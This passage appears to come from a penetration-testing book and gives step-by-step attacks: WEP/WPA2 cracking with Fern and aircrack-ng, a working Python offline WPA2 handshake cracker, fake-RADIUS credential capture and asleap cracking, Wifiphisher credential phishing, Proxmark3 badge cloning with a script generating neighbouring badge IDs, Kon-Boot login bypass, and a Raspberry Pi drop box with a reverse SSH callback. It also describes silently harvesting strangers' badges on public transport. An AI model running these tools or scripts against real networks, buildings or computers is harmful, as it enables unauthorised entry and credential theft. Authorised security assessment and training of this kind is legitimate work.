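# Constructed sample in airodump-ng CSV layout: an AP table, a blank line, a station table.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2015-02-24 08:00:01, 2015-02-24 08:05:10,  6,  54, WEP , WEP, , -48,  120,  3000,   0.  0.  0.  0,   6, Rocket,
66:77:88:99:AA:BB, 2015-02-24 08:00:02, 2015-02-24 08:05:11, 11,  54, WPA2, CCMP, PSK, -60,   90,     0,   0.  0.  0.  0,  10, belkin.cba,
CC:DD:EE:FF:00:11, 2015-02-24 08:00:03, 2015-02-24 08:05:12,  1,  54, OPN , , , -70,   40,     0,   0.  0.  0.  0,   9, CoffeeNet,
22:33:44:55:66:77, 2015-02-24 08:00:04, 2015-02-24 08:05:13,  1,  54, WPA2, CCMP, PSK, -75,   30,     0,   0.  0.  0.  0,   0, ,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:AA:AA:AA:AA:01, 2015-02-24 08:00:05, 2015-02-24 08:05:14, -50,   200, 00:11:22:33:44:55, Rocket
AA:AA:AA:AA:AA:02, 2015-02-24 08:00:06, 2015-02-24 08:05:15, -65,    80, 66:77:88:99:AA:BB,
AA:AA:AA:AA:AA:03, 2015-02-24 08:00:07, 2015-02-24 08:05:16, -80,     5, (not associated), CoffeeNet,Rocket
"""


def _table(block):
    """Parse one CSV table; fields past the header width (e.g. comma-separated
    probed ESSIDs) are folded back into the last column."""
    reader = csv.reader(io.StringIO(block.strip()))
    header = [h.strip() for h in next(reader)]
    rows = []
    for fields in reader:
        if not fields or not fields[0].strip():
            continue
        fields = [f.strip() for f in fields]
        if len(fields) > len(header):
            fields = fields[:len(header) - 1] + [",".join(fields[len(header) - 1:])]
        rows.append(dict(zip(header, fields)))
    return rows


def parse_airodump_csv(text):
    """Return ({bssid: ap_row}, [station_row, ...])."""
    ap_block, _, sta_block = text.replace("\r\n", "\n").strip().partition("\n\n")
    aps = {row["BSSID"]: row for row in _table(ap_block)}
    return aps, _table(sta_block)


def classify(ap):
    """Mirror Kismet's colour legend: open (yellow), WEP vs. WPA/WPA2 (green,
    split here because WEP is the easy target) and cloaked SSID (blue)."""
    tags = []
    if ap["ESSID"] == "" or ap["ID-length"] == "0":
        tags.append("cloaked")
    privacy = ap["Privacy"]
    if privacy == "OPN":
        tags.append("open")
    elif privacy.startswith("WEP"):
        tags.append("WEP")
    else:
        tags.append("secure")
    return tags


def clients_by_ap(aps, stations):
    """BSSID -> associated station MACs: the list you need before a targeted deauth."""
    out = {bssid: [] for bssid in aps}
    for sta in stations:
        if sta["BSSID"] in out:
            out[sta["BSSID"]].append(sta["Station MAC"])
    return out


def survey(text=SAMPLE_CSV):
    aps, stations = parse_airodump_csv(text)
    clients = clients_by_ap(aps, stations)
    return {b: {"essid": a["ESSID"], "channel": a["channel"], "privacy": a["Privacy"],
                "tags": classify(a), "clients": clients[b]} for b, a in aps.items()}


if __name__ == "__main__":
    for bssid, info in survey().items():
        print(bssid, info["essid"] or "<cloaked>", info["channel"], info["tags"], info["clients"])
```

Run it against `<prefix>-01.csv` from a real airodump-ng session by passing the file contents to `survey()`; stations that airodump marks "(not associated)" are deliberately left out of every AP's client list, since deauthing them gains nothing.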


Active Attacks 


After you identify the networks you are to attack, or the networks that are within scope of your assessment, you need to figure out which active attacks to use. We are going to focus on four main types of attacks: those against WEP, WPAv2, WPS, and WPA Enterprise.


One thing I want to reiterate is that we are going for the quickest and easiest way to crack wireless passwords or gain access to a wireless infrastructure. There are many different tools to attack WIFI (aircrack-ng, http://www.aircrack-ng.org/, is one of my favorites), but I will focus on getting the job done.


WEP - Wired Equivalent Privacy
We should all know by now that using WEP for wireless networks is insecure. I won't go into the details, but if you want to read about how it was implemented and configured improperly, you can visit the Wikipedia page on WEP.


If the organization is utilizing WEP and has at least one client, you should be able to crack the WEP key without an issue.


To accomplish this, we are going to use the Fern-Wi-Fi-Cracker tool to identify WEP networks and attempt to crack them. I am using Fern-Wi-Fi-Cracker because it is native to Kali and utilizes Aircrack-ng (which is my favorite Wi-Fi tool). One quick caveat: for the example below, the access point you are attacking needs to have at least one active host on that network, because the attack needs a steady stream of data frames (IVs) to work with. There are ways to get around this (search for Newsham's attack), but I won't go over them in this book because the following attack is the most common situation you will run into.


How to Crack WEP in Kali:
• At a command prompt, type:
    ◦ fern-wifi-cracker
• Select the drop down and pick your Wi-Fi interface (most likely wlan0)
• Click the Scan button
• And drop into WEP (the red Wi-Fi sign)





Fern WIFI Cracker

• Select the SSID you want to attack (in this case, Rocket)
• Click on Wi-Fi Attack on the right side
• Watch the IV count. You will need at least 10k IVs to crack the key (the count climbs faster when a client is actively sending data, and a 104-bit key needs more IVs than a 40-bit one)
• If it is successful, you will see the WEP key below


WEP Key Cracking


Now you can connect to that SSID with the recovered key and you are on that network.


WPAv2 (TKIP) - Wi-Fi Protected Access
WPAv2 doesn't have a vulnerability like WEP, so cracking the password is much more difficult. To have a successful attack, you need to capture the authentication handshake from a client to the access point. To cheat in this process, we can force a user to de-authenticate and then re-authenticate. Once we capture the handshake, we won't be able to just strip the password out; we will have to brute-force or crack the password. Let's see this in progress.


Before we can start sniffing, we need to enable the capture file settings within Fern-WiFi-Cracker, in order to use the handshake file for cracking.
• At a command prompt, type:
    ◦ fern-wifi-cracker
• Go to the ToolBox
• Click on the WIFI Attack Options
• Select Capture File Settings


WIFI Attack Settings - Enabling Capture File Settings


• Hit ESC until you are back at the home screen of Fern-Wifi-Cracker
• Select the drop down and pick your Wi-Fi interface (most likely wlan0)
• Click the Scan button
• And drop into WPA (the blue Wi-Fi sign)
• Select your SSID to attack
• Click on WIFI Attack
• In the following image, you will see the cap file created


WPA Handshake Capture


We need to first clean the cap file to make sure it will work with our password cracker. This can be accomplished with wpaclean:
• wpaclean <out.cap> <in.cap>


Please note that the wpaclean argument order is <out.cap> <in.cap> instead of <in.cap> <out.cap>, which may cause some confusion.{33}


To crack the WPA handshake, we need to convert the cleaned cap file into an hccap file. We are going to do this with aircrack-ng:

• aircrack-ng <out.cap> -J <out.hccap>

• Note the -J is an upper case J and not a lower case j (aircrack-ng appends the .hccap extension to the name you give it).


    root@kali:~/Desktop# wpaclean out.cap <in.cap>
    Pwning belkin.cba Capture File (WPA).
    Net 94:44:52:... belkin.cba

    root@kali:~/Desktop# aircrack-ng out.cap -J <out.hccap>

Cleaning WPA Files


This gives you the file you feed to oclHashcat. Remember that the only way to get the WPAv2 passphrase is to brute-force it: every guess has to be run through PBKDF2 and checked against the MIC in the captured handshake. To see how to accomplish WPAv2 hccap password-cracking, go to the Cracking WPAv2 with oclHashcat section below.
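To make the "brute-force is the only way" point concrete, here is the computation oclHashcat performs for every candidate in your wordlist, written out in plain Python. This is an added example for this chapter, not the book's code and not oclHashcat: it derives the PMK with PBKDF2, expands it with the 802.11i PRF to get the KCK, recomputes the EAPOL MIC and compares it with the one in the handshake. The handshake it cracks is constructed in-line from a known passphrase rather than captured, so the script runs offline; with a real .hccap you would read the same fields (SSID, both MACs, both nonces, the message 2 EAPOL frame and its MIC) out of the file.

```python
"""Offline dictionary attack against a captured WPA2-PSK four-way handshake.
Added example for this chapter: it is not the book's code and not oclHashcat,
but it performs the same computation a cracker runs over the contents of an
.hccap (SSID, both MACs, both nonces, the EAPOL message 2 frame and its MIC),
which is why a handshake plus a wordlist is all that is needed.  The handshake
below is constructed in-line from a known passphrase rather than captured."""
import hashlib
import hmac

# Offset of the 16-byte MIC inside an EAPOL-Key frame: 802.1X header (4) +
# descriptor type (1) + key info (2) + key length (2) + replay counter (8) +
# nonce (32) + IV (16) + RSC (8) + key ID (8) = 81
MIC_OFFSET = 81


def pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This step is what makes WPA2 cracking slow: 4096 SHA-1 rounds per guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    """First 16 bytes of the PTK (the Key Confirmation Key) from the 802.11i PRF-512:
    HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || min/max MAC || min/max nonce || i)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(
        hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return ptk[:16]


def eapol_mic(kck_bytes, frame):
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with the MIC
    field zeroed)[:16].  WPA/TKIP (version 1) uses HMAC-MD5 instead."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck_bytes, zeroed, hashlib.sha1).digest()[:16]


def crack(handshake, wordlist):
    """Return the first candidate whose derived KCK reproduces the captured MIC, else None."""
    for candidate in wordlist:
        k = kck(pmk(candidate, handshake["ssid"]), handshake["ap_mac"], handshake["sta_mac"],
                handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(k, handshake["eapol"]), handshake["mic"]):
            return candidate
    return None


def build_handshake(passphrase, ssid="belkin.cba"):
    """CONSTRUCTED handshake for the demo (not a real capture): message 2 of the
    four-way handshake, with its MIC computed from the given passphrase."""
    ap_mac, sta_mac = bytes.fromhex("944452000001"), bytes.fromhex("aaaaaaaaaa02")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    key_info = b"\x01\x0a"  # MIC bit | pairwise | key descriptor version 2 (HMAC-SHA1)
    body = (b"\x02" + key_info + b"\x00\x10" + b"\x00" * 7 + b"\x01" + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body
    mic = eapol_mic(kck(pmm := pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce), frame)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": frame, "mic": mic}


if __name__ == "__main__":
    hs = build_handshake("correct horse")
    print(crack(hs, ["password", "belkin123", "correct horse", "letmein"]))
```

The expensive line is `pmk()`: 4096 HMAC-SHA1 rounds per guess, keyed to the SSID, which is why oclHashcat runs it on the GPU and why a rainbow table for one SSID is useless against another. Everything after the PMK is cheap, so a mismatched MIC costs almost nothing to reject.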


WPAv2 WPS (Wi-Fi Protected Setup) Attacks

WPS (originally known as Wi-Fi Simple Config) was created to make it simple to establish a secure connection to a wireless router/access point.{34} All you need to do is enter a PIN when connecting to an access point, without knowing the long complex password. The issue stems from the fact that the PIN can be brute-forced relatively quickly: the 8-digit PIN is verified in two halves and its last digit is a checksum, so at most about 11,000 guesses are needed.{35} What's even better is that on some access points you cannot disable WPS even if you turn it off in the configuration page. As you saw previously with Kismet, the manufacturer of the device can be identified via passive sniffing. There is a public Google document that lists a large number of vulnerable devices and the tools that can be used to attack WPS.


The steps to attack WPS are similar to WPAv2, but instead of a Regular Attack, pick the WPS Attack and wait for the results. That same Google document gives the estimated time it would take to attack a specific device.


Attack Panel - WPS Attack


WPA Enterprise - Fake Radius Attack
One of my favorite attacks for enterprise environments is the fake Radius attack. The problem with WPAv2 Enterprise networks is that all the normal WEP/WPAv2 TKIP type attacks do not work. To get around this, Josh Wright developed a method to capture username/password combinations for WPAv2 Enterprise-grade wireless using a Radius server.{36}


Configuring a Radius server
To configure your Radius server, we need to download and patch it (research, concept, and code originated from Josh Wright at willhackforsushi.com):

• wget ftp://ftp.freeradius.org/pub/freeradius/old/freeradius-server-2.1.12.tar.bz2
• tar xfj freeradius-server-2.1.12.tar.bz2
• cd freeradius-server-2.1.12
• wget http://willhackforsushi.com/code/freeradius-wpe-2.1.12.patch
• We need to next patch and build our Radius server:
    ◦ patch -p1 < freeradius-wpe-2.1.12.patch
    ◦ ./configure && make && make install
• We need to edit the configuration (clients.conf lives in the install's raddb directory, /usr/local/etc/raddb with the default prefix; 192.168.1.1 is the address of the access point you control, and the shared secret must match the one configured on that access point):
    ◦ cat >> clients.conf <<EOF
    ◦ client 192.168.1.1 {
    ◦     secret = mysecret
    ◦ }
    ◦ EOF
• radiusd -X
• In a separate terminal:
    ◦ tail -f /usr/local/var/log/radius/freeradius-server-wpe.log


Example Output:

    mschap: Fri Jun 7 02:19:39 2013
        username: admin
        challenge: 07:50:2a:b7:a6:4d:24:d1
        response: fc:9d:19:06:c0:79:c3:f5:ad:db:6b:79:59:2f:7f:6e:d8:05:19:c4:5d:26:30:08
    mschap: Sat Jun 8 23:02:39 2013
        username: user1
        challenge: 34:ab:f0:95:62:52:85:40
        response: 9e:0c:e7:80:06:2f:a0:0b:c3:d7:c7:d7:c6:38:ec:0a:e5:a3:57:80:33:2c:8e:0f
    mschap: Sat Jun 8 23:28:43 2013
        username: test
        challenge: 12:ea:f1:24:f5:4b:e8:7e
        response: be:17:da:45:c0:88:ed:9c:eb:c9:5c:38:b8:1f:3e:8f:90:cd:17:16:ad:87:b3:ed

Once you capture the username, challenge and response for an authentication request, you can move on to prepping the password lists. Before you can crack the passwords, you need to convert a word list into the format the Asleap application uses to brute-force them. This can be accomplished with the following command, which converts the darkc0de password list into the two index files Asleap reads:

• genkeys -r darkc0de.lst -f words.dat -n words.idx


Asleap is a tool used to recover LEAP and PPTP style (MS-CHAPv2) credentials, using the password list produced by genkeys. Asleap takes the challenge (-C) and response (-R) as demonstrated below:


    root@bt:~/wireless# asleap -f words.dat -n words.idx -C 07:50:2a:b7:a6:4d:24:d1 -R fc:9d:19:06:c0:79:c3:f5:ad:db:6b:79:59:2f:7f:6e:d8:05:19:c4:5d:26:30:08
    asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    hash bytes:        0157
    NT hash:           5e75991673df11d5c5c4d95015bf0157
    password:          hacker


In the example above, we were able to recover the password behind the challenge/response hash for a WPA-Enterprise authentication. Now, take these credentials and log into their wireless network.


Wifite
(https://github.com/derv82/wifite) (Kali Linux)


Wifite is another WIFI attacking tool that I highly recommend using. With similar functionality to fern-wifi-cracker, Wifite is another front end to Aircrack-ng and Reaver, driven from the terminal rather than a GUI. In certain cases, I found Wifite to work better than my other tools. To start Wifite:

• cd /opt/wifite

• python ./wifite.py


Once you have wifite.py running, it automatically starts scanning the networks for access points. In the 
image below, we identify a WEP network with an ESSID of “me”. 


Wifite Example


Once you have identified a target, press “CTRL-C” and pick the value of the ESSID you want to 
attack. In this case, we will attack ESSID number 5. Once selected, this will kick off the WEP attack 
to capture and crack IVs. 





Successful Attack 


That’s pretty much it. Even better, if the access point isn’t vulnerable to WEP attacks, but is 
vulnerable to WPS and utilizes WPAv2, Wifite will kick off Reaver to attack WPS. If that is 
unsuccessful, it will attack WPA by disassociating clients and capturing the authentication handshake. 


WifiPhisher
(Kali Linux)

Wifiphisher is a security tool that mounts fast, automated phishing attacks against WiFi networks in order to obtain secret passphrases and other credentials. It is a social engineering attack that, unlike other methods, does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages or WPA/WPA2 secret passphrases.{37}


I love seeing creative WIFI type attacks. This is nothing new in terms of standing up a cloned SSID, deauthing users, and cloning pages, but Wifiphisher puts all these attacks together in an easy-to-use script. You do need to make sure that you have two USB WIFI network cards installed (one to run the rogue access point, one to deauthenticate clients from the real one).


• cd /opt/wifiphisher/
• python ./wifiphisher.py


Wifiphisher will stand up a couple web servers and clone an access point of your choice. 


    root@kali:/opt/wifiphisher# python ./wifiphisher.py
    Ctrl-C at any time to copy an access point from below
    Choose the [num] of the AP you wish to copy: 3
    Starting the fake access point...

Wifiphisher





It will deauth all other users and when they reconnect to our access point, no matter what page they visit, they will be redirected to our malicious page. The default page is a router web admin page, but we can just as easily use SET from our social engineering section and create a clone page of our choice.

Fake Authentication Page


Another, more manual approach to the same idea is the infernal-twin:

https://github.com/entropy1337/infernal-twin


Feel free to play around with these attacks, develop those that work best for your environment and 
customize them. 


Badge Cloning 


The standard in HID badge cloning is the Proxmark3.{38} Although this RFID tag reader/writer is a little pricey ($400+), it is a must have. It is important to understand frequency and card types. The kit from HackerWarehouse comes with the following:
• Low Frequency Antenna: tuned to operate at 125 kHz and 134 kHz and capable of reading proximity cards at a distance of 4 cm.
• High Frequency Antenna: tuned to operate at 13.56 MHz and capable of snooping the UID of a Mifare 1K Classic card at a distance of 3 cm.
• Tag bundle: includes three types of RFID tags: a T5557 (EM4100, HID and Indala compatible, 125 kHz) read/write card, a Mifare 1K (13.56 MHz) test card, and an EM4100 (125 kHz) test card.
• Prox Box
e Prox Box 


The most common HID badge card I see is the ProxCard II. This card has been around for a long time 
due to the low cost and ease of use, and is commonly seen in small/medium size companies. Many 
companies that rent space from a shared office building usually do not have a choice in which card 
their building uses. This also means these types of cards won't be going away anytime soon. 
Penetration testers love the ProxCard II because it does not have any encryption or require 
challenge/response authentication by default. 


Some companies use high frequency cards like Mifare, which use crypto; however even these have 
been found to be vulnerable. {39} In this demonstration, we will focus on the ProxCard II. 





Proxmark3 


Out of the box, the Proxmark3 firmware will need to be updated. I won't go through every step, but a great place to get you started is located here:


https://github.com/Proxmark/proxmark3/wiki/Windows


I did have some issues trying to get the Proxmark3 to work. So, I have included my notes to help you 
get through the troubleshooting process. 


After the initial driver installation located in the section "UPDATE PROXMARK TO THE NEW CDC Serial INTERFACE":
• After I did FLASH New Bootrom in procedure 2 and let go of the Proxmark button, it still only showed up under libusb-win32 devices instead of on a COM port.
• I first followed the WINDOWS PROBLEMS IN RECOGNIZING COM PORT section to update the drivers while the button was pushed.
• After completing that, I let go of the button, unplugged it again, pushed the button, plugged it back in, and the COM port showed up (only while the button is pushed). I went ahead and ran FLASH - Bootrom.bat, FLASH - FPGA fullimage.bat, and FLASH - OS.bat. After that, I let go of the button and everything worked like a charm. Now, if everything is working, run: proxmark3.exe [com port]


There are many proxmark3 commands{40}, but we will go through the ones that matter.
• lf hid fskdemod - Realtime HID FSK demodulator (reads HID tags)
• lf hid clone - Clone HID to T55x7 (writes the tag ID to a blank card)


1. First put the Proxmark3 into listener mode with "lf hid fskdemod". Any HID card within an inch of the antenna will show its tag ID.

2. After we remove the HID card we want to clone, we configure the Proxmark3 to write to a blank T55x7 card. Put the blank card on the antenna and use the command "lf hid clone [TAG ID]" to write to that card.

3. We need to verify that we wrote to that card by putting the Proxmark3 back in listener mode and making sure our new cloned card shows the same tag ID.


    MINGW32 /c/Projects/Proxmark/pm3-bin-756 (cdc+lua)
    $ proxmark3.exe com4
    proxmark3> lf hid fskdemod
    TAG ID: 2004520045 (26326)
    TAG ID: 2004520045 (26326)
    TAG ID: 2004520045 (26326)
    ... (repeats while the card is on the antenna)
    Stopped
    proxmark3> lf hid clone 2004520045
    Cloning tag with ID 2004520045
    DONE!
    proxmark3> lf hid fskdemod
    TAG ID: 2004520045 (26326)
    TAG ID: 2004520045 (26326)
    ... (the cloned card now reads back with the same ID)

Proxmark3 - Badge Cloning





Once you have your device configured, you can connect the external battery back to the Proxmark3, 
however, you can only clone one badge at a time. To get around this problem and the battery pack 
issue, we turn to Kali Nethunter and a Nexus 7 tablet. 


Get It Working In Kali Nethunter
(https://forums.kali.org/showthread.php?23151-Tutorial-make-proxmark3-works-with-nethunter):





1. Download http://thehackerplaybook.com/Download/proxdroid-bin-848.rar

2. Inside the proxdroid rar file, copy the file /system/bin/proxmark3 to the Nexus' /system/bin directory. Make sure to change the permissions to [rwxr-xr-x] (chmod 755 /system/bin/proxmark3).

3. Next, copy both /system/lib/libreadline.so and /system/lib/libtermcap.so from the rar to the /system/lib directory with permissions [rw-r--r--] (chmod 644).

4. We need to find out which port the Proxmark3 is using when connected to the Nexus device. A quick way to do this is dmesg:

    [ 1449.061372] cdc_acm 1-2.1:1.0: ttyACM0: USB ACM device
    [ 1449.073765] usbcore: registered new interface driver cdc_acm
    [ 1449.073770] cdc_acm: USB Abstract Control Model driver for USB modems and ISDN adapters

   In this case our interface is ttyACM0.

5. Once we have moved all the files to our Nexus device and found which interface our Proxmark3 is using, we can start up our device from /system/bin in a terminal:

    proxmark3 /dev/[interface - e.g. ttyACM0]

6. I had errors with permissions on the Nexus when moving the files to /system/bin and /system/lib. To fix that issue, I had to re-mount the /system folder read-write:

   Nexus 7 Gen1:
    mount -o rw,remount /dev/block/platform/sdhci-tegra.3/by-name/APP /system ext4 ro,relatime,user_xattr,acl,barrier=1,data=ordered 0 0

   Nexus 7 Gen2:
    mount -o rw,remount /dev/block/platform/msm_sdcc.1/by-name/system /system








Proxmark3 - Portable with Nexus 


Again, the issue with running a Proxmark3 with a battery pack was that you could only clone one 
card. Moreover, the issue with running it off a laptop is the size. With the Nexus tablet and a tablet 
case, I am able to power and run the Proxmark3 software with full functionality. Holding the tablet 
case, I can easily go in an elevator/subway/bus, hold my tablet case near everyone’s badge and 
constantly collect them. I can then write them out to cards and use them to walk right in. 


One other thing that I have seen from collecting tag IDs is that companies generally buy tags in bulk. 
The HID tag IDs are set at the manufacturer site, so if you collect a number of tags, you can figure out 
the ranges in which they exist. For example, in the example tag above (2004520045), we can brute- 
force through the tags near that range. Since different badges have different permissions, it is good to 
test if you are able to guess a privileged badge using something like: 


https://github.com/brad-anton/proxbrute. 
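The brute-force idea above rests on the structure of the tag ID. The script below is an added example for this chapter that reimplements the idea behind proxbrute in Python; it is not proxbrute's code or the book's, and it assumes the standard 26-bit H10301 layout that most ProxCard II badges use (the raw value printed by `lf hid fskdemod` carries a preamble bit and a format-length bit above a 26-bit word of even parity, 8-bit facility code, 16-bit card number, odd parity). It decodes a raw ID into facility code and card number, re-encodes neighbouring card numbers with correct parity, and prints them as `lf hid clone` commands. The IDs it works on are constructed, not collected from anyone's badge.

```python
"""Decode the raw ID that `lf hid fskdemod` prints into facility code and card
number, and re-encode neighbouring card numbers (with correct parity) so each
can be written with `lf hid clone`.  Added example for this chapter: it
reimplements the idea behind proxbrute in Python and is not that project's code
or the book's.  It assumes the standard HID 26-bit (H10301) layout, the format
most ProxCard II badges use; the IDs used below are constructed, not collected."""

# Bits the Proxmark output carries above the 26-bit card word: the preamble bit
# (bit 37) and the format-length marker bit (bit 26), which together give the
# "2004..."/"2006..." prefix seen in fskdemod output.
HEADER_26 = (1 << 37) | (1 << 26)


def _ones(value, nbits):
    """Parity (1 = odd number of set bits) of the low nbits of value."""
    return bin(value & ((1 << nbits) - 1)).count("1") & 1


def encode_h10301(facility, card):
    """Build the raw value: even parity | 8-bit FC | 16-bit CN | odd parity, under the header bits."""
    data = ((facility & 0xFF) << 16) | (card & 0xFFFF)   # 24 data bits
    even = _ones(data >> 12, 12)                          # even parity over the high 12 data bits
    odd = 1 - _ones(data, 12)                             # odd parity over the low 12 data bits
    return HEADER_26 | (even << 25) | (data << 1) | odd


def decode_h10301(raw):
    """Return (facility, card, parity_ok) for a raw ID such as 0x2004520045.
    parity_ok False means the tag is not standard 26-bit; it still clones as-is."""
    word = raw & ((1 << 26) - 1)
    data = (word >> 1) & 0xFFFFFF
    facility, card = data >> 16, data & 0xFFFF
    parity_ok = ((word >> 25) == _ones(data >> 12, 12)) and ((word & 1) == 1 - _ones(data, 12))
    return facility, card, parity_ok


def neighbours(raw, spread=5):
    """Candidate IDs for badges bought in the same batch: same facility code,
    card numbers around the observed one, each as the hex string `lf hid clone` takes."""
    fc, cn, _ = decode_h10301(raw)
    return [(cn + d, f"{encode_h10301(fc, cn + d):010x}")
            for d in range(-spread, spread + 1) if d and 0 <= cn + d <= 0xFFFF]


if __name__ == "__main__":
    observed = encode_h10301(41, 34)            # constructed: facility code 41, card 34
    print(f"observed {observed:010x} -> FC/CN/parity {decode_h10301(observed)}")
    for cn, hexid in neighbours(observed, 2):
        print(f"lf hid clone {hexid}   # card {cn}")
```

Feed `decode_h10301()` the hex values you collected and the facility code will usually be constant across one company; the card numbers then tell you how wide the batch is and where to aim the guesses. A `parity_ok` of False means the badge is not plain 26-bit and the neighbour arithmetic does not apply, although the raw ID itself still clones unchanged.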


Kon-Boot
(http://www.piotrbania.com/all/kon-boot/) (Windows/OS X)


On a physical test, you might have gotten into the building, but you need a quick and easy way to get onto systems and servers. This is where Kon-Boot comes into play. Kon-Boot is a bootable USB device that allows you to bypass authentication on both Windows and OS X.


On Windows, Kon-Boot has additional functionality to bypass the login without changing the password. However, on OS X, you need to either reset the password to blank or create a new user. The software works by "virtually modifying the EFI bios and then modifying parts of the OS X kernel. Such changes are only made in virtual memory and they disappear after computer reboot." http://www.piotrbania.com/all/kon-boot/


For both Windows and OS X (and Linux), there are known ways to get around authentication. On Windows, you can use something like ntpassword{41}, and on OS X, you can drop into single-user mode and reset the admin password.{42} However, since my focus is really on efficiency, Kon-Boot is the tool of choice: all you have to do is plug in the USB drive, reboot, and log into your victim host.


The installation is pretty straightforward. After you purchase the corporate version of Kon-Boot, you 
will get a Windows executable. Take any USB stick and it will install Kon-Boot onto that device. All 
you need to do now is carry this little USB device: 





KON-BOOT USB Stick


Windows 


On a reboot or system startup, make sure it boots from the USB drive so that Kon-Boot will kick in. 


    Kon-Boot ver. 2.4 - ready! 32/64bit
    Please note this software is protected by copyright laws.
    Checking SMAP BIOS entries ...

Kon-Boot Bootup


After Kon-Boot finishes, you will come to a login screen with no password configured. Just hit 
“enter” and you will be in the system. Another benefit is that it installs the sticky key functionality to 
popup a system shell. 


The best part of Kon-Boot is that once you reboot the system, the original password will be put back 
on the system. The end user will never know what happened. 


OS X: 


OS X Kon-boot for the most part is similar to the single-user mode reset. Kon-Boot can either reset 
the user account’s password or create a new user account under kon-boot:kon-boot. 





    [0] Use kon-boot for Windows (UEFI)
    [1] Use kon-boot for Mac
    Using kon-boot for Mac!
    Scanning all disk drives
    Found handles=8 (SelfHandle=6CB75190)
    MacBootEfi device found, id = 2 (6F7A5390)
    MacBootEfi device found, id = 3 (6F7A3390)
    Found our drive at index=6 (out of 8)
    Found 2 mac devices!
    Installing our driver...
    Please pick your option (0-1):
    [0] Use bypass feature (no new account)
    [1] Use new-account feature (login: kon-boot password: kon-boot)
    Using bypass mode!
    Driver loaded!
    Ready for lift off!
    Everything seems to be ready <press any key to continue>

Kon-boot on OS X

Kon-boot - OS X No Password


One thing to note is that this will not work against drives that are encrypted (full-disk encryption such as BitLocker or FileVault has to be unlocked before the OS that Kon-Boot patches even loads), and a firmware password that blocks booting from USB stops it just as well. For most tests these days, I am finding that laptops are more often encrypted, while desktops are not.


Pentesting Drop Box - Raspberry Pi 2 


On a physical engagement, a pentesting drop box is essential to have in your toolkit. You can clone a 
couple badges, sneak your way into a company, drop a device onto the corporate infrastructure, and 
run. Either your drop box connects back via cellular or Wi-Fi, or it creates a remote shell back to a 
server of your choice. 


The big professional version of this is called a PwnPlug and you can purchase one from here: http://pwnieexpress.com/products/pwnplug-elite. The only problem is that the cost is pretty outrageous and the chance of losing your device is pretty high.


In the previous Hacker Playbook, we used the oDroid U2, because of the speed and RAM 
requirements. The only downside was that although it was a fraction of the price of the PwnPlug, it 
still came to about $100 per box. If you have done a physical test before, you know you have lost a 
few in the process and $100+ adds up quick. 


Luckily for us, the Raspberry Pi 2 was released, which is now six times faster (900 MHz quad core) and has 1 GB of RAM.{43}


You will have to buy a few items separately from the board, but not much: 


• Power adaptor
• USB Wi-Fi adaptor
• 8 GB or larger microSD card, Class 10 or higher
• HDMI cable to view what is going on when booting the first time





Raspberry Pi2 Running Kali Linux 


Download Kali Linux for the Raspberry Pi 2:
• https://www.offensive-security.com/kali-linux-vmware-arm-image-download/


Or create your own image:
• https://itfellover.com/1-kali-from-git-clone-and-booting-in-19-steps/





Setting up your new drop box with Kali is pretty easy. The guys over at Offensive Security did some 
great work and included ARM support specifically for one of these devices. 


Once you have downloaded or created the image for the Raspberry Pi 2, we need to write Kali to the microSD card. Plug the SD card into your 64-bit Kali host and locate the device; dmesg right after plugging it in will show where it was attached. Make sure you have dd pointed at the right device, because the of= target below is overwritten completely.


Build the image on a 64-bit version of Kali Linux and write it to the SD card:
• wget https://raw.githubusercontent.com/offensive-security/kali-arm-build-scripts/master/build-deps.sh
• chmod +x build-deps.sh && ./build-deps.sh
• dd if=/root/kali-1.1.0-rpi.img of=/dev/sdb bs=4M


Move that SD card from your Kali host to the Raspberry Pi 2 and run some initial configuration to regenerate the SSH host keys (the stock image ships with a known set), change the root password, and expand the filesystem to fill the card:

• update-rc.d -f ssh remove
• update-rc.d -f ssh defaults
• dpkg-reconfigure openssh-server
• passwd
• wget https://raw.github.com/dweeber/rpiwiggle/master/rpi-wiggle
• chmod +x rpi-wiggle
• ./rpi-wiggle


Afterwards, you can install whichever tools you need to install onto that image. 


Once you have your Raspberry Pi 2 configured to your liking, we need to install a reverse shell to use it as a drop box. I developed a quick little script called pi_phone_home. Once installed and running, whenever the drop box is plugged into any network, it automatically phones home and gives the attacker a full SSH tunnel to the drop box host.


From a terminal type:
• git clone https://www.github.com/cheetz/pi_phone_home /opt/pi_phone_home
• cd /opt/pi_phone_home && chmod +x *


We also need to make some modifications to the callback script. Remember that this box will log into your server on the Internet via SSH and create a reverse tunnel on that server. You will have to give the script login credentials for your Internet-facing server; since sshpass reads the password straight out of this file, protect the file and, once it works, consider switching to a dedicated SSH key for a restricted account:

• gedit callback.sh
• edit the domains, usernames, passwords, and port numbers

    #!/bin/sh
    # Do nothing if a tunnel to our server is already running
    if ps -ef | grep -v grep | grep [your server you own] ; then
        exit 0
    else
        # Reverse tunnel: port 2221 on the server forwards to port 22 on this Pi
